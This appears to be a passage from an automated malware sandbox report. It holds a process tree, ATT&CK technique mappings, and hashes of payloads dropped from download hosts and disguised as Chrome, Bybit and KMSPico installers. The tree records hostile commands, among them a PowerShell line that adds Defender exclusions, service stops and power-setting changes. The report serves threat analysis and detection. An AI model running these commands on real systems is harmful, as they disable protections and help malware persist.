  2⤵
  - Launches sc.exe
  PID:2296
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2476
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2268
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:1092
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3772
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:4920
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2292
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4084
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:4464

C:\ProgramData\Windows11\Updater.exe
C:\ProgramData\Windows11\Updater.exe
1⤵
PID:3508
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
622bf737a997b9a257f15dc3b9ee9da5

SHA1
6beba023f9c081393b64de079969e948a47be8be

SHA256
bcefb9a5dbc47579f8b52cc37fd7591a0e20f00f0a7867df0232088db90273d7

SHA512
c1833c09ef0b3e643b8657874e8a99d7d154ac255c326d85fccba53aa57679e7dad93e61b3b8419937cb7ad936eab727c5edd6c4be6b988982c1d61505305e77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
639967301e2e4310273b7487d20706b2

SHA1
679595d05d414b4c0fc59319bf3a9a7c604bff0e

SHA256
4154ab78575e62f292b0dc8fde7d46228a055d457766b940c32fe7d35fb07c70

SHA512
d8e893418713b5bfaf74ac69cce910ba430001778d5782d83f6e1760701aa2c176267300c508b1040e6dc65e96fe21a51d18e6242a62c6e338e28acdabb8e0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ec9ddd1da023e46cfe113cc499b7146f

SHA1
6ee70538bfcb68e8adb3a55fe8ced8ff7ed53d04

SHA256
9123db91174b625d6061c2d79c8db997012c47cf0d0fc96c0c2ed7da559dcb48

SHA512
ec45fbf2840bd216ea35c4088da73912dd514e2733f54b5da7707d7bf0ad351c74d644517723480d69082431e5de0f5f9f9d6031c1c195fc86385c3cc77b9c27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
29f45c7081b5b60c981ca741885664bd

SHA1
0a37feff448941f1b7b7161e438ea97e69fc6f52

SHA256
2d4fb26e3efe6e150ca2fc4fd309ff979ab9f7b3232c30d4256194b534ec8c71

SHA512
82df3dca1e5532e0eb5654931a190a12b1250bf8cb4c4994cf7164e7835bb2d3650a384ab47dbdb3b097513ed95ae5789d7d3cfb3c9b8c07bd130c24d9421dd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Killing

Filesize
11KB

MD5
632076e43ff6f1c2ec3fc59d2ac115c5

SHA1
84567549ca5422d2c16b1d34a310fbe75b25ef08

SHA256
432a473f21a57610df93773a79ae94365d6c2b6aa1555123bfdd658a6f28cf2f

SHA512
ebb9364fd541a27af4065690193436ddd951440135f67e45e51c0650baf8ee198712208f7ed46d8a3c475b2345f33eaa76880d76dde1babaf1c0239bab71148d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t0bzh5a0.1wk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\http159.223.8.77xc.exe.exe

Filesize
53KB

MD5
03e3f2ef4fd55cbd9fdb9fa32c6559e4

SHA1
4253fc48000d8c241d84898cb700d5446e01a910

SHA256
fff9bbd1e4988e48d79c9b85c2e8799b4379da25e2be121d2cc3389a1c2ffc94

SHA512
dd6570c7617063b1b33f1c14d377e3aae193e7bef717efeedf0464d80afab61a40f76b3de419ab3b98f7faa33b78be33443dd0da1101c1adfbe068395826376c

Download Submit
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe

Filesize
9KB

MD5
8d8e6c7952a9dc7c0c73911c4dbc5518

SHA1
9098da03b33b2c822065b49d5220359c275d5e94

SHA256
feb4c3ae4566f0acbb9e0f55417b61fefd89dc50a4e684df780813fb01d61278

SHA512
91a573843c28dd32a9f31a60ba977f9a3d4bb19ffd1b7254333e09bcecef348c1b3220a348ebb2cb08edb57d56cb7737f026519da52199c9dc62c10aea236645

Download Submit
C:\Users\Admin\AppData\Local\Temp\http31.41.244.11filesEDge.exe.exe

Filesize
2.4MB

MD5
f01ed03b7a786c24ebd92eab9b441b9d

SHA1
891c8ef7b9ef32e9d4de3ee473186cd4ba66059f

SHA256
6dc5fcbd3d05cb11dc4731aea996c7cbc213253c4d4b119799c5ddedebe537fb

SHA512
a8041c03e9fd9ab1c2bf4bb6fde3948c803b1592e24fdd112387249b83dff0309d14be6d7bdd19a4d1c5fee3b931e45b13c361e38ac15358afa7b82652cf55e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe

Filesize
10.2MB

MD5
4f4e640b100583635e7d7218bc03a047

SHA1
90fe08e4c8dd5fe7f5c6411529d8b41cef09746c

SHA256
b68f20b21290f3398b67a6c4b645d5ea94aeaf8e3da4272554b0b8e03753d08c

SHA512
772940dc7d6962f03d7cec23893b71408f69d8d4266f8d770164df012fea149cf21a3b1f67164ecacf938ed43c8bf3bb19966048e8a6056a739e7a9c4fe5b5ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe

Filesize
13.3MB

MD5
17b81f863b1cb9fa2ba7b1d78b6039f5

SHA1
d5948798b78cbbbd775b05f3f194e57babc89c32

SHA256
8e74dad0ba6445fd3417cd79fc43dd8c367e2bdf3d8125130d08770e1b184959

SHA512
77e373129cef89a2d93a14bb74c72b9aec03a5b2e046c4cbcd47cd0e92a77d1b85474d4cdab617a4cb1ef0ce83da3695c2d419dd4b72688e30c6c22d845fb022

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgdlo2adownloadsin.exe.exe

Filesize
2.6MB

MD5
13d33a7b26b28c2fcd4508b5207df238

SHA1
191d203c8d3bb987e900e48327f7a6c263886835

SHA256
e407bd010e2e640169a2812066864cd837b10506f01316dc2cada9ba64d99428

SHA512
0a20d3167d09c9b461034e01906ef985f513a4f2d103dc30f687e2561acd567dc662747e56c8abe051a4cd70264909257e9992ccc9d04cc1d5e45b46768f25e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe

Filesize
18.6MB

MD5
8073361dd5d31d48eeabaf11905901ab

SHA1
efc5307058b4038c16e48173af35863dc28d11f4

SHA256
12d8444a064d4f61155b62b9ed3f1d8c0be646aef7bb321e5933e0638b52f68a

SHA512
3d3163761a93ff5ab1e0efe44da163c00f7286bca556a2b7a53e07bdad5078aa8159a0c451064e3ae787c25844feef6382bb7be7575675bf2168d9be2207de43

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgkcatelinjamesondownloadsGoogle_Chrome.exe.exe

Filesize
24.8MB

MD5
716fbe4d981ed8d90c8929e75d11285d

SHA1
1b267341fea5f76651497d3873ae714ea1736f53

SHA256
bdb358bcbb24d6e0fdab1c1638f01c55f514571a33e0a2b070c9fb6f6ddac9f0

SHA512
68916d0fd4ed3ccd9a1dbef9555f6740750677fcebcb0c7ffd7d690d6ee8beea730d07814e070317ba197aeed494a649873b95e7e14106ae92d5aff851aff9ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgkcatelinjamesondownloadsSoftShipment.exe.exe

Filesize
1.0MB

MD5
88f2f4df57c115ab7062c7a2a23e454a

SHA1
c517ba7a8811e890735ae7a80573f3a4f0fd6fe1

SHA256
08f30ece5f7e77a69e58a970b3684c2a0eba1aa203ac97836dad32fc10a15e90

SHA512
98e24b69949230c9b7a1ae072c15c113a1a4b22d6ef530d403e6ef63076e47429d9d002b05161548d05ce1053e1ae3f21c2cb4f6e754717c2cb8ed6c21e8b898

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgkcatelinjamesondownloadseasyfirewall.exe.exe

Filesize
21.4MB

MD5
cb3952f1852179348f8d2db91760d03b

SHA1
4d2c9d9b09226524868760263c873edc664456a9

SHA256
a9ea40670a686e175cc8c32e3fc6ba92505379303d6524f149022490a2dda181

SHA512
163006435a30b31ff0b079215efc0cedf6a624516af1ffccbc6144cfdb205b822029d523f28ec86e0391af1b741771b860cf4d3492c87567a55f541a39c69d11

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgnhbghnj1kjhi1adownloadsNewApp.exe.exe

Filesize
5.8MB

MD5
c441be4f7fd0f07fdcf94657c624c3da

SHA1
bedd1f5d2feb959599b370590f62f02cbb3d2d3f

SHA256
47c6484dde4d9ca23a7667b1b71c5ed88d7cdd3dccf57485333ceda0153e5684

SHA512
c753bfa2b84ea5dfc47dbe25b807af6dd7d79e53a780ef693052f0c5c774767ef5b277671b07c539132af11a56546de3dd18790ce3fb3c4f66ca63c6c17fd8ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgnhbghnj1kjhi1adownloadsUpdater.exe.exe

Filesize
5.6MB

MD5
cd7727ab8db0c0968981a19fab763e32

SHA1
66242a286175e43f2d1299bd2594b30ac3d7cf00

SHA256
c658854ae75c8f001ab83644793d6c692f50aeddc29d2c593d6c02c5361add51

SHA512
b6d1d2d21e5210cabd741385aa52eb328afe79d948f232c12ff8a876a8652fb1667c28d2c73fe0ab2011c69f0d946de0e56ce890ceb81150b30b64d168a80b3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe

Filesize
2.6MB

MD5
61d3abff46a6bd2946925542c7d30397

SHA1
1fed80a136e67a5b7b6846010a5853400886ee9c

SHA256
b1a351ee61443b8558934dca6b2fa9efb0a6d2d18bae61ace5a761596604dbfa

SHA512
e9e25995faff34da94d30394474471dba45f5993a2efd07f5fb8c15cfdf7b3efa7c89d6796c66323938a1c31b3b89bd7578bef7c4297c6a9b68811f00aa89975

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgprogrammerbfhsoftbfhdownloadssdadsasad.png.exe

Filesize
426KB

MD5
9a9d216f95f0bbdd7efc41722cc81310

SHA1
525bbf6b547e2e4fbbe06d1ef948907b8f9812c2

SHA256
6be9c015c82645a448831d9dc8fcae4360228f76dff000953a76e3bf203d3ec8

SHA512
bae368040511371092f918a6baf282541f11a4478c1d2de41c6c4c1a8caa4318acb0e5caa16cc3c821d7047411d053fa49b3401f43b8028a715ed4591012600a

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpquiz.bloomingkids.comKMSPicoInstaller.exe.exe

Filesize
8KB

MD5
f5256f26aef600f6b5afc3f62b087251

SHA1
78738715afca4f5e60bd619d1d09a50738b91188

SHA256
457b1c96ba778c12dfebc10d718bdd66ff50a253d79629d68838a191e35d1f8a

SHA512
13ecada6079a23ef18030884740326eee9d8cad0d8045f5c948aa98cb0840e2b35f38249463a2ec7e4aea93eedacbec745787beed9e72e797ad55abe2fb7157b

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe

Filesize
19.2MB

MD5
5714fda573903cc3a216c135ae24317c

SHA1
93da70bac751c0e81ddce05d2f38e82266a2c9d3

SHA256
dcebdabfa1a0cdbd79211415d000141b6ce923bce9817533c57a7c0450279259

SHA512
aa70cd4376ae24cbca6eee74cd53f300e6bd6653e1770c9e696fedb34725a84bd8b7d23db156dc0940c5a878b38d83abb5d78df1bc144f4f28e3c665d2051a49

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com1.exe.exe

Filesize
5.1MB

MD5
1db00ee7f85164f081e7cf05d7fa08a9

SHA1
3873ac785933719ff58d25085d66ceb5c1759e25

SHA256
a428a19abb6b3df11ef0abb1b0766df0b431400b362c1227f81ae3912f01d95c

SHA512
7f38a1fa8c1e770bd59734289668659aa8470b3d5a61842f5102b6e75ead71f13a98ccc2225df8a12a142bc125efb8851cb17c5cb59242baa2b22331553e7c10

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com2.exe.exe

Filesize
9.7MB

MD5
ac51b053655353a458b6b55f7519e56b

SHA1
577eaa28dcffff652ca513a000ec00eceddda9df

SHA256
a8bfb588ac2006a3634cf50fcf144459cb4a748ef4b69c3c8170efcf4666438d

SHA512
8901dfd2dd12f60a425ef8bb812396e953afe5094a86720b08ec9893cf3fdb8b80d8060dbf68cc5bfa7021e1b4a3e54d147ff938ebe3dea3d76086a2ef178513

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com3.exe.exe

Filesize
16.0MB

MD5
2dc8cdf825e23ff1df1ad11b3a6f1973

SHA1
82af57e0e6d7cf944148d3a16d7c8ca94fa982f8

SHA256
5d215747817125559e1a2d934c301ab466cbc956a6839c8a45f8b02b84b184d0

SHA512
3f20bb95a167d10a2998a63ab0ccd69fe81822d24a39d868d019ac0ff890067c23c015dc0be531d9531be26d6d3f44d7f11c23214ba4778e038b6844f8c8879b

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com4.exe.exe

Filesize
728KB

MD5
58d65f5fca31cd83c18163b56b27f246

SHA1
ebb839bff73785c78d54128b235f72ce1c5c0cee

SHA256
7b827fb44a58dd2362be39abafa00a74e2f105c0fc5a5aa4ef3f3bdac5d13408

SHA512
5502a4d0e57fe051edf0098a32fce0ebe94108c841d327e773764fcf62c95dec96af772c0f8fbc56e2b7220d3189931c09905f24838eb3dc3f539dcfd3ffac5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe

Filesize
83KB

MD5
06560b5e92d704395bc6dae58bc7e794

SHA1
fbd3e4ae28620197d1f02bfc24adaf4ddacd2372

SHA256
9eaaadf3857e4a3e83f4f78d96ab185213b6528c8e470807f9d16035daadf33d

SHA512
b55b49fc1bd526c47d88fcf8a20fcaed900bfb291f2e3e1186ec196a87127ed24df71385ae04fedcc802c362c4ebf38edfc182013febf4496ddeb66ce5195ee3

Download Submit
C:\Users\Admin\AppData\Roaming\d3d9.dll

Filesize
541KB

MD5
dc549891f3adf185519dac769dc669ea

SHA1
3cde4b2a6fb10a8e38f748e599e6e991eae69a57

SHA256
3715beb83eb45b0061492ce984e8443f6bfebdc700c69c0afd77248535ce78df

SHA512
0a2c8efa19fece86c30acf8711614e0630e484465a7715fe2b0fcb34feed08f4a641e6cbe8abf5adca13dffab8f8e330d90fd949378bfae5501305b9757f1580

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
memory/464-274-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/464-273-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/1092-421-0x00007FF767070000-0x00007FF767BE9000-memory.dmp

Filesize
11.5MB

Download
memory/1160-224-0x0000000004AE0000-0x0000000004B72000-memory.dmp

Filesize
584KB

Download
memory/1160-225-0x0000000004AB0000-0x0000000004ABA000-memory.dmp

Filesize
40KB

Download
memory/1160-223-0x0000000004FF0000-0x0000000005594000-memory.dmp

Filesize
5.6MB

Download
memory/1160-222-0x0000000000140000-0x00000000001FC000-memory.dmp

Filesize
752KB

Download
memory/1216-263-0x0000000000400000-0x000000000045D000-memory.dmp

Filesize
372KB

Download
memory/1216-259-0x0000000000400000-0x000000000045D000-memory.dmp

Filesize
372KB

Download
memory/1640-380-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1640-384-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1640-381-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1640-382-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1640-383-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1640-387-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/1920-423-0x0000000000FF0000-0x0000000001064000-memory.dmp

Filesize
464KB

Download
memory/1920-424-0x0000000003150000-0x0000000003156000-memory.dmp

Filesize
24KB

Download
memory/1968-376-0x000002433AE40000-0x000002433AE46000-memory.dmp

Filesize
24KB

Download
memory/1968-372-0x000002433ABD0000-0x000002433ABEC000-memory.dmp

Filesize
112KB

Download
memory/1968-373-0x000002433ABF0000-0x000002433ACA5000-memory.dmp

Filesize
724KB

Download
memory/1968-374-0x000002433ACB0000-0x000002433ACBA000-memory.dmp

Filesize
40KB

Download
memory/1968-375-0x000002433AE60000-0x000002433AE7A000-memory.dmp

Filesize
104KB

Download
memory/2196-345-0x00000202E3BC0000-0x00000202E3BDC000-memory.dmp

Filesize
112KB

Download
memory/2196-346-0x00000202E3BB0000-0x00000202E3BBA000-memory.dmp

Filesize
40KB

Download
memory/2196-347-0x00000202E3BE0000-0x00000202E3BE8000-memory.dmp

Filesize
32KB

Download
memory/2196-348-0x00000202E3BF0000-0x00000202E3BFA000-memory.dmp

Filesize
40KB

Download
memory/2196-333-0x00000202E3970000-0x00000202E3992000-memory.dmp

Filesize
136KB

Download
memory/2488-396-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2488-392-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2488-388-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2488-390-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2488-395-0x00000289CC330000-0x00000289CC350000-memory.dmp

Filesize
128KB

Download
memory/2488-400-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2488-397-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2488-399-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2488-398-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2488-391-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2488-389-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2488-393-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2488-394-0x0000000140000000-0x0000000140848000-memory.dmp

Filesize
8.3MB

Download
memory/2728-401-0x00007FF6992B0000-0x00007FF69A8BC000-memory.dmp

Filesize
22.0MB

Download
memory/2728-449-0x00007FF6992B0000-0x00007FF69A8BC000-memory.dmp

Filesize
22.0MB

Download
memory/2728-580-0x00007FF6992B0000-0x00007FF69A8BC000-memory.dmp

Filesize
22.0MB

Download
memory/2792-94-0x0000000006FC0000-0x0000000006FD1000-memory.dmp

Filesize
68KB

Download
memory/2792-60-0x0000000005490000-0x00000000057E4000-memory.dmp

Filesize
3.3MB

Download
memory/2792-88-0x0000000006E30000-0x0000000006E3A000-memory.dmp

Filesize
40KB

Download
memory/2792-38-0x00000000024A0000-0x00000000024D6000-memory.dmp

Filesize
216KB

Download
memory/2792-39-0x0000000004BC0000-0x00000000051E8000-memory.dmp

Filesize
6.2MB

Download
memory/2792-95-0x0000000006FF0000-0x0000000006FFE000-memory.dmp

Filesize
56KB

Download
memory/2792-96-0x0000000007000000-0x0000000007014000-memory.dmp

Filesize
80KB

Download
memory/2792-97-0x00000000070F0000-0x000000000710A000-memory.dmp

Filesize
104KB

Download
memory/2792-98-0x00000000070D0000-0x00000000070D8000-memory.dmp

Filesize
32KB

Download
memory/2792-41-0x0000000004AA0000-0x0000000004AC2000-memory.dmp

Filesize
136KB

Download
memory/2792-42-0x0000000004B40000-0x0000000004BA6000-memory.dmp

Filesize
408KB

Download
memory/2792-47-0x0000000005320000-0x0000000005386000-memory.dmp

Filesize
408KB

Download
memory/2792-93-0x0000000007030000-0x00000000070C6000-memory.dmp

Filesize
600KB

Download
memory/2792-61-0x0000000005A80000-0x0000000005A9E000-memory.dmp

Filesize
120KB

Download
memory/2792-63-0x0000000005AB0000-0x0000000005AFC000-memory.dmp

Filesize
304KB

Download
memory/2792-72-0x0000000006050000-0x0000000006082000-memory.dmp

Filesize
200KB

Download
memory/2792-73-0x000000006FBB0000-0x000000006FBFC000-memory.dmp

Filesize
304KB

Download
memory/2792-83-0x00000000060C0000-0x00000000060DE000-memory.dmp

Filesize
120KB

Download
memory/2792-85-0x0000000007460000-0x0000000007ADA000-memory.dmp

Filesize
6.5MB

Download
memory/2792-86-0x0000000006DB0000-0x0000000006DCA000-memory.dmp

Filesize
104KB

Download
memory/2792-84-0x0000000006A90000-0x0000000006B33000-memory.dmp

Filesize
652KB

Download
memory/3600-301-0x0000000000400000-0x000000000045C000-memory.dmp

Filesize
368KB

Download
memory/3600-300-0x0000000000400000-0x000000000045C000-memory.dmp

Filesize
368KB

Download
memory/4068-446-0x0000000000400000-0x0000000000C4C000-memory.dmp

Filesize
8.3MB

Download
memory/4076-237-0x0000000005E00000-0x0000000006154000-memory.dmp

Filesize
3.3MB

Download
memory/4076-246-0x00000000069B0000-0x00000000069FC000-memory.dmp

Filesize
304KB

Download
memory/4084-591-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4084-590-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4204-558-0x000001AC6FC30000-0x000001AC6FCE5000-memory.dmp

Filesize
724KB

Download
memory/4284-1-0x00000190131D0000-0x00000190131DA000-memory.dmp

Filesize
40KB

Download
memory/4284-87-0x00007FFC0F870000-0x00007FFC10331000-memory.dmp

Filesize
10.8MB

Download
memory/4284-2-0x00007FFC0F870000-0x00007FFC10331000-memory.dmp

Filesize
10.8MB

Download
memory/4284-0-0x00007FFC0F873000-0x00007FFC0F875000-memory.dmp

Filesize
8KB

Download
memory/4396-201-0x0000000002D70000-0x0000000002FD3000-memory.dmp

Filesize
2.4MB

Download
memory/4396-154-0x0000000000400000-0x0000000000E2A000-memory.dmp

Filesize
10.2MB

Download
memory/4396-118-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/4396-117-0x0000000002D70000-0x0000000002FD3000-memory.dmp

Filesize
2.4MB

Download
memory/4516-232-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download
memory/4516-233-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download
memory/4576-435-0x00000000083C0000-0x00000000083D2000-memory.dmp

Filesize
72KB

Download
memory/4576-437-0x0000000008580000-0x00000000085CC000-memory.dmp

Filesize
304KB

Download
memory/4576-436-0x0000000008420000-0x000000000845C000-memory.dmp

Filesize
240KB

Download
memory/4576-434-0x0000000008470000-0x000000000857A000-memory.dmp

Filesize
1.0MB

Download
memory/4576-433-0x0000000008940000-0x0000000008F58000-memory.dmp

Filesize
6.1MB

Download
memory/4576-431-0x0000000000400000-0x000000000046E000-memory.dmp

Filesize
440KB

Download
memory/4984-535-0x00007FF7EC170000-0x00007FF7ECCE9000-memory.dmp

Filesize
11.5MB

Download
memory/5092-226-0x0000000002780000-0x00000000027D9000-memory.dmp

Filesize
356KB

Download